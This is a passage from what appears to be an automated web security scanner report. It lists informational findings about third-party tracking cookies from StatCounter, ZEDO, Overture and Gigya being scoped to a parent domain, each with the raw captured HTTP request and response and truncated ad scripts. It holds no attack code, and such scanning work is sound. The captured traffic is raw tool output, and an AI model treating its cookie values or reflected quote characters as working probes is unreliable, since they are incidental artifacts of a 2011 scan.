P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

10.7. http://c.statcounter.com/t.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=594085&resolution=1920&h=1200&camefrom=http%3A//drupal.org/cases&u=http%3A//www.popsugar.com/community/welcome&t=Welcome&java=1&security=defbf778&sc_random=0.8725620578043163&sc_snum=1&invisible=1 HTTP/1.1
Host: c.statcounter.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831680.0; expires=Sat, 10-Sep-2016 12:48:00 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

10.8. http://c13.statcounter.com/t.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c13.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=1345764&resolution=1920&h=1200&camefrom=http%3A//drupal.org/cases&u=http%3A//www.nowpublic.com/&t=NowPublic.com%20%7C%20The%20News%20is%20NowPublic&java=1&security=26324a10&sc_random=0.533788861008361 HTTP/1.1
Host: c13.statcounter.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831677.0

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831677.0-1345764.1315831702.0; expires=Sat, 10-Sep-2016 12:48:22 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

10.9. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=8&a=0&f=&n=1545&r=13&d=14&q=&$=&s=2&z=0.5840262724086642 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFSkp=305,7040,15,1:; ZEDOIDX=13; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24; FFcat=826,622,9:1545,8,9:305,7040,15:305,7038,15; FFad=0:0:0:0; PI=h484782Za669088Zc826000622,826000622Zs403Zt1255Zm768Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:3944d'$1545:1a0a560b687152eaa6ee3ef9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,622,14:1545,8,14:826,622,9:1545,8,9:1545,8,0:0,8,9:1545,0,9:305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:29:27:1:1:1:1:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMCap=2470020B826,110235,110236|1,1#0,24:0,1#0,24;expires=Wed, 12 Oct 2011 12:48:53 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=165
Expires: Mon, 12 Sep 2011 12:51:38 GMT
Date: Mon, 12 Sep 2011 12:48:53 GMT
Content-Length: 4602
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='1a0a560b687
...[SNIP]...

10.10. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFSkp=305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=305,7038,15:826,622,9:1545,8,9:305,7040,15;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24;expires=Wed, 12 Oct 2011 12:48:31 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=153
Expires: Mon, 12 Sep 2011 12:51:04 GMT
Date: Mon, 12 Sep 2011 12:48:31 GMT
Content-Length: 7450
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='';var zz
...[SNIP]...

10.11. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=7040/7039/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=1638&z=0.628017297713086 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFcat=305,7038,15; FFad=0; PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 507
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:1a0a560b9425736c82ba903c,1a0a560bbbeb671a3b382570;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7040,15:305,7038,15:305,7038,0:0,7038,15:305,0,15:826,622,9:1545,8,9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:29:1:1:1:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7040,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=146
Expires: Mon, 12 Sep 2011 12:51:03 GMT
Date: Mon, 12 Sep 2011 12:48:37 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1638;var zzPat='1a0a56
...[SNIP]...

10.12. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fmr.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.2381083215586841 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 407
Content-Type: application/x-javascript
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=305,7038,15:305,0,15:826,622,9:1545,8,9:305,7040,15;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=5:0:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=152
Expires: Mon, 12 Sep 2011 12:51:04 GMT
Date: Mon, 12 Sep 2011 12:48:32 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='';var zz
...[SNIP]...

10.13. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.9584475292358547 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=2:2:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 420
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:5406e';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=4:2:1:0:0:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=85
Expires: Mon, 12 Sep 2011 13:05:03 GMT
Date: Mon, 12 Sep 2011 13:03:38 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='5406e''
...[SNIP]...

10.14. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=8&a=0&f=&n=1545&r=13&d=9&q=&$=&s=2&z=0.3701211323495954 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=3:3:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFMCap=2470080B826,110235|0,1#0,24;expires=Wed, 12 Oct 2011 13:03:56 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,622,9:1545,8,9:305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:1:3:3:1:0:0;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=157
Expires: Mon, 12 Sep 2011 13:06:33 GMT
Date: Mon, 12 Sep 2011 13:03:56 GMT
Content-Length: 4557
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCust
...[SNIP]...

10.15. http://c7.zedo.com/utils/ecSet.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js?v=PI=h1201513Za1013066Zc305007038%2C305007038Zs608Zt1255Zm768Zb43199&d=.zedo.com HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; FFcat=305,7038,15; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199;expires=Wed, 12 Oct 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "2971d9-1f5-47f29204ac3c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=6687
Date: Mon, 12 Sep 2011 12:48:33 GMT
Connection: close



10.16. http://cm.npc-morris.overture.com/js_1_0/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.npc-morris.overture.com
Path:   /js_1_0/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_1_0/?config=9472395290&type=home_page&ctxtId=home_page&source=npc_morris_savannahmorningnews_t2_ctxt&adwd=420&adht=150&ctxtUrl=http%3A//savannahnow.com/&css_url=http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.css&tg=1&bg=FFFFFF&bc=FFFFFF&refUrl=http%3A//drupal.org/cases&du=1&cb=1315849723547 HTTP/1.1
Host: cm.npc-morris.overture.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyMjSyNnCxMAY6dMoAw=

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:41 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyNHF0dXZ2cAN%2bpN%2bAw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Thu, 09-Sep-2021 12:48:41 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4627


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...

10.17. http://counters.gigya.com/wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://counters.gigya.com
Path:   /wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wildfire/IMP/CXNID=2000002.0NXC/bT*xJmx*PTEyNDQ3NDEyOTY5MTImcHQ9MTI*NDc*MTMwMjIwOSZwPTQyNTgyMyZkPSZnPTImdD*mbz*2MTBjODEwNzJhYmE*ZDBjYjBkMWE5NjE3ZTNkOTA*YSZzPWFudGlxdWV3ZWVrLmNvbSZvZj*w.gif HTTP/1.1
Host: counters.gigya.com
Proxy-Connection: keep-alive
Referer: http://www.observer.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ucid=RFq8Ln1vPSaBPMmq4LEJ0w==; _mkto_trk=id:672-YBF-078&token:_mch-gigya.com-1314893715569-60156; __utma=246645010.642220752.1314893716.1314893716.1314893716.1; __utmz=246645010.1314893716.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Sep 2011 12:48:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web204
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Connection: close
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: GF_1640683793=http://www.observer.com/; path=/
Set-Cookie: GF_1640683793=http://www.observer.com/; domain=gigya.com; path=/
Set-Cookie: GP_12447412969121244741302209=1640683793; path=/
Set-Cookie: GP_12447412969121244741302209=1640683793; domain=gigya.com; path=/
Set-Cookie: UUID=816512b5f435493ea41e36fb7f1fa2e6; expires=Sun, 12-Sep-2021 12:48:08 GMT; path=/
Set-Cookie: UUID=816512b5f435493ea41e36fb7f1fa2e6; domain=gigya.com; expires=Sun, 12-Sep-2021 12:48:08 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: image/gif
Content-Length: 49

